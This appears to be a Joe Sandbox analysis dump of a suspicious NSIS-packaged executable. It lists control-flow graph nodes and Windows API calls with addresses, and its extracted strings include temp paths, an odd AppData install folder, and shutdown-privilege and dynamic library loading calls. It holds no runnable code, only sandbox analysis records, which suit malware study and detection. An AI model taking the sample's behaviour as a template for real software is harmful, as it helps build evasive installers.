4219 402322 4222 402330 4219->4222 4223 402c37 17 API calls 4219->4223 4220->4219 4221 402c37 17 API calls 4220->4221 4221->4219 4224 402c37 17 API calls 4222->4224 4223->4222 4225 402339 WritePrivateProfileStringW 4224->4225 5266 401f86 5267 402c37 17 API calls 5266->5267 5268 401f8d 5267->5268 5269 40665c 5 API calls 5268->5269 5270 401f9c 5269->5270 5271 401fb8 GlobalAlloc 5270->5271 5273 402020 5270->5273 5272 401fcc 5271->5272 5271->5273 5274 40665c 5 API calls 5272->5274 5275 401fd3 5274->5275 5276 40665c 5 API 
calls 5275->5276 5277 401fdd 5276->5277 5277->5273 5281 4061c9 wsprintfW 5277->5281 5279 402012 5282 4061c9 wsprintfW 5279->5282 5281->5279 5282->5273 4233 402388 4234 402390 4233->4234 4235 4023bb 4233->4235 4245 402c77 4234->4245 4237 402c37 17 API calls 4235->4237 4239 4023c2 4237->4239 4250 402cf5 4239->4250 4240 4023a1 4242 402c37 17 API calls 4240->4242 4243 4023a8 RegDeleteValueW RegCloseKey 4242->4243 4244 4023cf 4243->4244 4246 402c37 17 API calls 4245->4246 4247 402c8e 4246->4247 4248 4060ef RegOpenKeyExW 4247->4248 4249 402397 4248->4249 4249->4240 4249->4244 4251 402d0b 4250->4251 4252 402d21 4251->4252 4254 402d2a 4251->4254 4252->4244 4255 4060ef RegOpenKeyExW 4254->4255 4256 402d58 4255->4256 4257 402dd0 4256->4257 4258 402d5c 4256->4258 4257->4252 4259 402d7e RegEnumKeyW 4258->4259 4260 402d95 RegCloseKey 4258->4260 4261 402db6 RegCloseKey 4258->4261 4263 402d2a 6 API calls 4258->4263 4259->4258 4259->4260 4262 40665c 5 API calls 4260->4262 4261->4257 4264 402da5 4262->4264 4263->4258 4265 402dc4 RegDeleteKeyW 4264->4265 4266 402da9 4264->4266 4265->4257 4266->4257 5283 40190c 5284 401943 5283->5284 5285 402c37 17 API calls 5284->5285 5286 401948 5285->5286 5287 405990 67 API calls 5286->5287 5288 401951 5287->5288 5289 401d0e 5290 402c15 17 API calls 5289->5290 5291 401d15 5290->5291 5292 402c15 17 API calls 5291->5292 5293 401d21 GetDlgItem 5292->5293 5294 40258c 5293->5294 5295 1000164f 5296 10001516 GlobalFree 5295->5296 5298 10001667 5296->5298 5297 100016ad GlobalFree 5298->5297 5299 10001682 5298->5299 5300 10001699 VirtualFree 5298->5300 5299->5297 5300->5297 5301 40190f 5302 402c37 17 API calls 5301->5302 5303 401916 5302->5303 5304 4058e4 MessageBoxIndirectW 5303->5304 5305 40191f 5304->5305 5306 401491 5307 4052e6 24 API calls 5306->5307 5308 401498 5307->5308 5309 402592 5310 4025c1 5309->5310 5311 4025a6 5309->5311 5313 4025f5 5310->5313 5314 4025c6 5310->5314 5312 402c15 17 API calls 5311->5312 5320 4025ad 5312->5320 5316 402c37 17 API 
calls 5313->5316 5315 402c37 17 API calls 5314->5315 5317 4025cd WideCharToMultiByte lstrlenA 5315->5317 5318 4025fc lstrlenW 5316->5318 5317->5320 5318->5320 5319 402629 5321 405e26 WriteFile 5319->5321 5323 40263f 5319->5323 5320->5319 5322 405e55 5 API calls 5320->5322 5320->5323 5321->5323 5322->5319 5324 10001058 5326 10001074 5324->5326 5325 100010dd 5326->5325 5327 10001516 GlobalFree 5326->5327 5328 10001092 5326->5328 5327->5328 5329 10001516 GlobalFree 5328->5329 5330 100010a2 5329->5330 5331 100010b2 5330->5331 5332 100010a9 GlobalSize 5330->5332 5333 100010b6 GlobalAlloc 5331->5333 5334 100010c7 5331->5334 5332->5331 5335 1000153d 3 API calls 5333->5335 5336 100010d2 GlobalFree 5334->5336 5335->5334 5336->5325 5337 401c19 5338 402c15 17 API calls 5337->5338 5339 401c20 5338->5339 5340 402c15 17 API calls 5339->5340 5341 401c2d 5340->5341 5342 401c42 5341->5342 5343 402c37 17 API calls 5341->5343 5344 401c52 5342->5344 5347 402c37 17 API calls 5342->5347 5343->5342 5345 401ca9 5344->5345 5346 401c5d 5344->5346 5349 402c37 17 API calls 5345->5349 5348 402c15 17 API calls 5346->5348 5347->5344 5350 401c62 5348->5350 5351 401cae 5349->5351 5352 402c15 17 API calls 5350->5352 5353 402c37 17 API calls 5351->5353 5354 401c6e 5352->5354 5355 401cb7 FindWindowExW 5353->5355 5356 401c99 SendMessageW 5354->5356 5357 401c7b SendMessageTimeoutW 5354->5357 5358 401cd9 5355->5358 5356->5358 5357->5358 5359 402a9a SendMessageW 5360 402ab4 InvalidateRect 5359->5360 5361 402abf 5359->5361 5360->5361 5362 40281b 5363 402821 5362->5363 5364 402829 FindClose 5363->5364 5365 402abf 5363->5365 5364->5365 5366 40149e 5367 4022f1 5366->5367 5368 4014ac PostQuitMessage 5366->5368 5368->5367 5369 40469f 5370 4046d5 5369->5370 5371 4046af 5369->5371 5373 40427e 8 API calls 5370->5373 5372 404217 18 API calls 5371->5372 5374 4046bc SetDlgItemTextW 5372->5374 5375 4046e1 5373->5375 5374->5370 5376 100010e1 5377 10001111 5376->5377 5378 100011d8 GlobalFree 5377->5378 5379 100012ba 2 
API calls 5377->5379 5380 100011d3 5377->5380 5381 100011f8 GlobalFree 5377->5381 5382 10001272 2 API calls 5377->5382 5383 10001164 GlobalAlloc 5377->5383 5384 100012e1 lstrcpyW 5377->5384 5385 100011c4 GlobalFree 5377->5385 5379->5377 5380->5378 5381->5377 5382->5385 5383->5377 5384->5377 5385->5377 5386 4015a3 5387 402c37 17 API calls 5386->5387 5388 4015aa SetFileAttributesW 5387->5388 5389 4015bc 5388->5389 5390 405425 5391 405446 GetDlgItem GetDlgItem GetDlgItem 5390->5391 5392 4055cf 5390->5392 5435 40424c SendMessageW 5391->5435 5394 405600 5392->5394 5395 4055d8 GetDlgItem CreateThread CloseHandle 5392->5395 5396 40562b 5394->5396 5397 405650 5394->5397 5398 405617 ShowWindow ShowWindow 5394->5398 5395->5394 5401 405665 ShowWindow 5396->5401 5402 40563f 5396->5402 5405 40568b 5396->5405 5403 40427e 8 API calls 5397->5403 5437 40424c SendMessageW 5398->5437 5399 4054b6 5404 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 5399->5404 5409 405685 5401->5409 5410 405677 5401->5410 5407 4041f0 SendMessageW 5402->5407 5408 40565e 5403->5408 5411 40552b 5404->5411 5412 40550f SendMessageW SendMessageW 5404->5412 5405->5397 5406 405699 SendMessageW 5405->5406 5406->5408 5413 4056b2 CreatePopupMenu 5406->5413 5407->5397 5417 4041f0 SendMessageW 5409->5417 5416 4052e6 24 API calls 5410->5416 5414 405530 SendMessageW 5411->5414 5415 40553e 5411->5415 5412->5411 5418 4062a4 17 API calls 5413->5418 5414->5415 5419 404217 18 API calls 5415->5419 5416->5409 5417->5405 5420 4056c2 AppendMenuW 5418->5420 5421 40554e 5419->5421 5422 4056f2 TrackPopupMenu 5420->5422 5423 4056df GetWindowRect 5420->5423 5424 405557 ShowWindow 5421->5424 5425 40558b GetDlgItem SendMessageW 5421->5425 5422->5408 5426 40570d 5422->5426 5423->5422 5427 40556d ShowWindow 5424->5427 5430 40557a 5424->5430 5425->5408 5428 4055b2 SendMessageW SendMessageW 5425->5428 5429 405729 SendMessageW 5426->5429 5427->5430 5428->5408 5429->5429 5431 405746 OpenClipboard EmptyClipboard GlobalAlloc 
GlobalLock 5429->5431 5436 40424c SendMessageW 5430->5436 5433 40576b SendMessageW 5431->5433 5433->5433 5434 405794 GlobalUnlock SetClipboardData CloseClipboard 5433->5434 5434->5408 5435->5399 5436->5425 5437->5396 5438 4028a7 5439 402c37 17 API calls 5438->5439 5440 4028b5 5439->5440 5441 4028cb 5440->5441 5443 402c37 17 API calls 5440->5443 5442 405d4f 2 API calls 5441->5442 5444 4028d1 5442->5444 5443->5441 5466 405d74 GetFileAttributesW CreateFileW 5444->5466 5446 4028de 5447 402981 5446->5447 5448 4028ea GlobalAlloc 5446->5448 5451 402989 DeleteFileW 5447->5451 5452 40299c 5447->5452 5449 402903 5448->5449 5450 402978 CloseHandle 5448->5450 5467 40332b SetFilePointer 5449->5467 5450->5447 5451->5452 5454 402909 5455 403315 ReadFile 5454->5455 5456 402912 GlobalAlloc 5455->5456 5457 402922 5456->5457 5458 402956 5456->5458 5460 4030fa 31 API calls 5457->5460 5459 405e26 WriteFile 5458->5459 5461 402962 GlobalFree 5459->5461 5465 40292f 5460->5465 5462 4030fa 31 API calls 5461->5462 5464 402975 5462->5464 5463 40294d GlobalFree 5463->5458 5464->5450 5465->5463 5466->5446 5467->5454 4276 4058aa ShellExecuteExW 5468 40432b lstrcpynW lstrlenW 4277 40202c 4278 40203e 4277->4278 4288 4020f0 4277->4288 4279 402c37 17 API calls 4278->4279 4281 402045 4279->4281 4280 401423 24 API calls 4284 40224a 4280->4284 4282 402c37 17 API calls 4281->4282 4283 40204e 4282->4283 4285 402064 LoadLibraryExW 4283->4285 4286 402056 GetModuleHandleW 4283->4286 4287 402075 4285->4287 4285->4288 4286->4285 4286->4287 4300 4066cb WideCharToMultiByte 4287->4300 4288->4280 4291 402086 4294 4020a5 4291->4294 4295 40208e 4291->4295 4292 4020bf 4293 4052e6 24 API calls 4292->4293 4296 402096 4293->4296 4303 10001759 4294->4303 4297 401423 24 API calls 4295->4297 4296->4284 4298 4020e2 FreeLibrary 4296->4298 4297->4296 4298->4284 4301 4066f5 GetProcAddress 4300->4301 4302 402080 4300->4302 4301->4302 4302->4291 4302->4292 4304 10001789 4303->4304 4345 10001b18 4304->4345 4306 10001790 4307 
100018a6 4306->4307 4308 100017a1 4306->4308 4309 100017a8 4306->4309 4307->4296 4393 10002286 4308->4393 4377 100022d0 4309->4377 4314 1000180c 4320 10001812 4314->4320 4321 1000184e 4314->4321 4315 100017ee 4406 100024a4 4315->4406 4316 100017d7 4330 100017cd 4316->4330 4403 10002b57 4316->4403 4317 100017be 4319 100017c4 4317->4319 4323 100017cf 4317->4323 4319->4330 4387 1000289c 4319->4387 4325 100015b4 3 API calls 4320->4325 4327 100024a4 10 API calls 4321->4327 4322 100017f4 4417 100015b4 4322->4417 4397 10002640 4323->4397 4332 10001828 4325->4332 4328 10001840 4327->4328 4344 10001895 4328->4344 4428 10002467 4328->4428 4330->4314 4330->4315 4335 100024a4 10 API calls 4332->4335 4334 100017d5 4334->4330 4335->4328 4339 1000189f GlobalFree 4339->4307 4341 10001881 4341->4344 4432 1000153d wsprintfW 4341->4432 4342 1000187a FreeLibrary 4342->4341 4344->4307 4344->4339 4435 1000121b GlobalAlloc 4345->4435 4347 10001b3c 4436 1000121b GlobalAlloc 4347->4436 4349 10001d7a GlobalFree GlobalFree GlobalFree 4350 10001d97 4349->4350 4367 10001de1 4349->4367 4351 100020ee 4350->4351 4360 10001dac 4350->4360 4350->4367 4353 10002110 GetModuleHandleW 4351->4353 4351->4367 4352 10001c1d GlobalAlloc 4372 10001b47 4352->4372 4355 10002121 LoadLibraryW 4353->4355 4356 10002136 4353->4356 4354 10001c86 GlobalFree 4354->4372 4355->4356 4355->4367 4443 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4356->4443 4357 10001c68 lstrcpyW 4358 10001c72 lstrcpyW 4357->4358 4358->4372 4360->4367 4439 1000122c 4360->4439 4361 10002188 4362 10002195 lstrlenW 4361->4362 4361->4367 4444 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4362->4444 4364 10002048 4364->4367 4369 10002090 lstrcpyW 4364->4369 4367->4306 4368 10002148 4368->4361 4376 10002172 GetProcAddress 4368->4376 4369->4367 4370 10001cc4 4370->4372 4437 1000158f GlobalSize GlobalAlloc 4370->4437 4371 10001f37 GlobalFree 4371->4372 4372->4349 
4372->4352 4372->4354 4372->4357 4372->4358 4372->4364 4372->4367 4372->4370 4372->4371 4375 1000122c 2 API calls 4372->4375 4442 1000121b GlobalAlloc 4372->4442 4373 100021af 4373->4367 4375->4372 4376->4361 4385 100022e8 4377->4385 4379 10002410 GlobalFree 4382 100017ae 4379->4382 4379->4385 4380 100023ba GlobalAlloc 4383 100023d1 4380->4383 4381 1000238f GlobalAlloc WideCharToMultiByte 4381->4379 4382->4316 4382->4317 4382->4330 4383->4379 4450 100025d4 4383->4450 4384 1000122c GlobalAlloc lstrcpynW 4384->4385 4385->4379 4385->4380 4385->4381 4385->4383 4385->4384 4446 100012ba 4385->4446 4388 100028ae 4387->4388 4389 10002953 SetFilePointer 4388->4389 4390 10002971 4389->4390 4391 10002a62 GetLastError 4390->4391 4392 10002a6d 4390->4392 4391->4392 4392->4330 4394 10002296 4393->4394 4395 100017a7 4393->4395 4394->4395 4396 100022a8 GlobalAlloc 4394->4396 4395->4309 4396->4394 4401 1000265c 4397->4401 4398 100026c0 4400 100026c5 GlobalSize 4398->4400 4402 100026cf 4398->4402 4399 100026ad GlobalAlloc 4399->4402 4400->4402 4401->4398 4401->4399 4402->4334 4404 10002b62 4403->4404 4405 10002ba2 GlobalFree 4404->4405 4453 1000121b GlobalAlloc 4406->4453 4408 10002506 MultiByteToWideChar 4412 100024ae 4408->4412 4409 1000252b StringFromGUID2 4409->4412 4410 1000253c lstrcpynW 4410->4412 4411 1000254f wsprintfW 4411->4412 4412->4408 4412->4409 4412->4410 4412->4411 4413 1000256c GlobalFree 4412->4413 4414 100025a7 GlobalFree 4412->4414 4415 10001272 2 API calls 4412->4415 4454 100012e1 4412->4454 4413->4412 4414->4322 4415->4412 4458 1000121b GlobalAlloc 4417->4458 4419 100015ba 4420 100015c7 lstrcpyW 4419->4420 4422 100015e1 4419->4422 4423 100015fb 4420->4423 4422->4423 4424 100015e6 wsprintfW 4422->4424 4425 10001272 4423->4425 4424->4423 4426 100012b5 GlobalFree 4425->4426 4427 1000127b GlobalAlloc lstrcpynW 4425->4427 4426->4328 4427->4426 4429 10002475 4428->4429 4431 10001861 4428->4431 4430 10002491 GlobalFree 4429->4430 4429->4431 4430->4429 4431->4341 
4431->4342 4433 10001272 2 API calls 4432->4433 4434 1000155e 4433->4434 4434->4344 4435->4347 4436->4372 4438 100015ad 4437->4438 4438->4370 4445 1000121b GlobalAlloc 4439->4445 4441 1000123b lstrcpynW 4441->4367 4442->4372 4443->4368 4444->4373 4445->4441 4447 100012c1 4446->4447 4448 1000122c 2 API calls 4447->4448 4449 100012df 4448->4449 4449->4385 4451 100025e2 VirtualAlloc 4450->4451 4452 10002638 4450->4452 4451->4452 4452->4383 4453->4412 4455 100012ea 4454->4455 4456 1000130c 4454->4456 4455->4456 4457 100012f0 lstrcpyW 4455->4457 4456->4412 4457->4456 4458->4419 5469 402a2f 5470 402c15 17 API calls 5469->5470 5471 402a35 5470->5471 5472 402a6c 5471->5472 5474 402885 5471->5474 5475 402a47 5471->5475 5473 4062a4 17 API calls 5472->5473 5472->5474 5473->5474 5475->5474 5477 4061c9 wsprintfW 5475->5477 5477->5474 5478 401a30 5479 402c37 17 API calls 5478->5479 5480 401a39 ExpandEnvironmentStringsW 5479->5480 5481 401a4d 5480->5481 5483 401a60 5480->5483 5482 401a52 lstrcmpW 5481->5482 5481->5483 5482->5483 5489 401db3 GetDC 5490 402c15 17 API calls 5489->5490 5491 401dc5 GetDeviceCaps MulDiv ReleaseDC 5490->5491 5492 402c15 17 API calls 5491->5492 5493 401df6 5492->5493 5494 4062a4 17 API calls 5493->5494 5495 401e33 CreateFontIndirectW 5494->5495 5496 40258c 5495->5496 5497 4043b4 5498 4044e6 5497->5498 5500 4043cc 5497->5500 5499 404550 5498->5499 5501 40461a 5498->5501 5506 404521 GetDlgItem SendMessageW 5498->5506 5499->5501 5502 40455a GetDlgItem 5499->5502 5503 404217 18 API calls 5500->5503 5508 40427e 8 API calls 5501->5508 5504 404574 5502->5504 5505 4045db 5502->5505 5507 404433 5503->5507 5504->5505 5510 40459a SendMessageW LoadCursorW SetCursor 5504->5510 5505->5501 5511 4045ed 5505->5511 5530 404239 EnableWindow 5506->5530 5513 404217 18 API calls 5507->5513 5509 404615 5508->5509 5531 404663 5510->5531 5515 404603 5511->5515 5516 4045f3 SendMessageW 5511->5516 5518 404440 CheckDlgButton 5513->5518 5515->5509 5520 404609 SendMessageW 5515->5520 
5516->5515 5517 40454b 5521 40463f SendMessageW 5517->5521 5528 404239 EnableWindow 5518->5528 5520->5509 5521->5499 5523 40445e GetDlgItem 5529 40424c SendMessageW 5523->5529 5525 404474 SendMessageW 5526 404491 GetSysColor 5525->5526 5527 40449a SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5525->5527 5526->5527 5527->5509 5528->5523 5529->5525 5530->5517 5534 4058aa ShellExecuteExW 5531->5534 5533 4045c9 LoadCursorW SetCursor 5533->5505 5534->5533 5535 402835 5536 40283d 5535->5536 5537 402841 FindNextFileW 5536->5537 5538 402853 5536->5538 5537->5538 5540 4029e0 5538->5540 5541 406282 lstrcpynW 5538->5541 5541->5540 5542 401735 5543 402c37 17 API calls 5542->5543 5544 40173c SearchPathW 5543->5544 5545 4029e0 5544->5545 5546 401757 5544->5546 5546->5545 5548 406282 lstrcpynW 5546->5548 5548->5545 5549 10002a77 5550 10002a8f 5549->5550 5551 1000158f 2 API calls 5550->5551 5552 10002aaa 5551->5552 5553 4014b8 5554 4014be 5553->5554 5555 401389 2 API calls 5554->5555 5556 4014c6 5555->5556 5557 404a3c 5558 404a68 5557->5558 5559 404a4c 5557->5559 5561 404a9b 5558->5561 5562 404a6e SHGetPathFromIDListW 5558->5562 5568 4058c8 GetDlgItemTextW 5559->5568 5564 404a85 SendMessageW 5562->5564 5565 404a7e 5562->5565 5563 404a59 SendMessageW 5563->5558 5564->5561 5566 40140b 2 API calls 5565->5566 5566->5564 5568->5563 4856 403d3e 4857 403e91 4856->4857 4858 403d56 4856->4858 4860 403ea2 GetDlgItem GetDlgItem 4857->4860 4861 403ee2 4857->4861 4858->4857 4859 403d62 4858->4859 4862 403d80 4859->4862 4863 403d6d SetWindowPos 4859->4863 4864 404217 18 API calls 4860->4864 4865 403f3c 4861->4865 4874 401389 2 API calls 4861->4874 4867 403d85 ShowWindow 4862->4867 4868 403d9d 4862->4868 4863->4862 4869 403ecc SetClassLongW 4864->4869 4866 404263 SendMessageW 4865->4866 4870 403e8c 4865->4870 4897 403f4e 4866->4897 4867->4868 4871 403da5 DestroyWindow 4868->4871 4872 403dbf 4868->4872 4873 40140b 2 API calls 4869->4873 4875 4041c1 4871->4875 4876 403dc4 
SetWindowLongW 4872->4876 4877 403dd5 4872->4877 4873->4861 4878 403f14 4874->4878 4875->4870 4885 4041d1 ShowWindow 4875->4885 4876->4870 4882 403de1 GetDlgItem 4877->4882 4883 403e7e 4877->4883 4878->4865 4879 403f18 SendMessageW 4878->4879 4879->4870 4880 40140b 2 API calls 4880->4897 4881 4041a2 DestroyWindow EndDialog 4881->4875 4886 403e11 4882->4886 4887 403df4 SendMessageW IsWindowEnabled 4882->4887 4884 40427e 8 API calls 4883->4884 4884->4870 4885->4870 4889 403e1e 4886->4889 4890 403e65 SendMessageW 4886->4890 4891 403e31 4886->4891 4900 403e16 4886->4900 4887->4870 4887->4886 4888 4062a4 17 API calls 4888->4897 4889->4890 4889->4900 4890->4883 4894 403e39 4891->4894 4895 403e4e 4891->4895 4893 404217 18 API calls 4893->4897 4898 40140b 2 API calls 4894->4898 4899 40140b 2 API calls 4895->4899 4896 403e4c 4896->4883 4897->4870 4897->4880 4897->4881 4897->4888 4897->4893 4902 404217 18 API calls 4897->4902 4918 4040e2 DestroyWindow 4897->4918 4898->4900 4901 403e55 4899->4901 4931 4041f0 4900->4931 4901->4883 4901->4900 4903 403fc9 GetDlgItem 4902->4903 4904 403fe6 ShowWindow KiUserCallbackDispatcher 4903->4904 4905 403fde 4903->4905 4928 404239 EnableWindow 4904->4928 4905->4904 4907 404010 EnableWindow 4912 404024 4907->4912 4908 404029 GetSystemMenu EnableMenuItem SendMessageW 4909 404059 SendMessageW 4908->4909 4908->4912 4909->4912 4911 403d1f 18 API calls 4911->4912 4912->4908 4912->4911 4929 40424c SendMessageW 4912->4929 4930 406282 lstrcpynW 4912->4930 4914 404088 lstrlenW 4915 4062a4 17 API calls 4914->4915 4916 40409e SetWindowTextW 4915->4916 4917 401389 2 API calls 4916->4917 4917->4897 4918->4875 4919 4040fc CreateDialogParamW 4918->4919 4919->4875 4920 40412f 4919->4920 4921 404217 18 API calls 4920->4921 4922 40413a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4921->4922 4923 401389 2 API calls 4922->4923 4924 404180 4923->4924 4924->4870 4925 404188 ShowWindow 4924->4925 4926 404263 SendMessageW 4925->4926 4927 4041a0 4926->4927 
4927->4875 4928->4907 4929->4912 4930->4914 4932 4041f7 4931->4932 4933 4041fd SendMessageW 4931->4933 4932->4933 4933->4896

                                                          Control-flow Graph
                                                          • Executed
                                                          • Not Executed
                                                          (The rendered control-flow graph is not recoverable as text. It covered the function at 00403373, basic blocks 00403373 through 004038B0, with the Executed / Not Executed legend marking which blocks ran in the sandbox; the API calls made from those blocks are listed under APIs below.)
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 00403396
                                                          • GetVersion.KERNEL32 ref: 0040339C
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                          • OleInitialize.OLE32(00000000), ref: 00403413
                                                          • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                          • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\450707124374000811.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\450707124374000811.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                            • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                            • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035D5
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F1
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                            • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                          • ExitProcess.KERNEL32 ref: 0040370A
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371D
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                          • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\450707124374000811.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                          • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                          • ExitProcess.KERNEL32 ref: 004038B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                          • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$C:\Users\user\Desktop$C:\Users\user\Desktop\450707124374000811.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 2488574733-1748544714
                                                          • Opcode ID: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                          • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                          • Opcode Fuzzy Hash: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                          • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E

                                                          Control-flow Graph (function starting at 00404C62; rendered graph with Executed / Not Executed node markings omitted)
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                          • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                          • DeleteObject.GDI32(00000000), ref: 00404D58
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                          • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
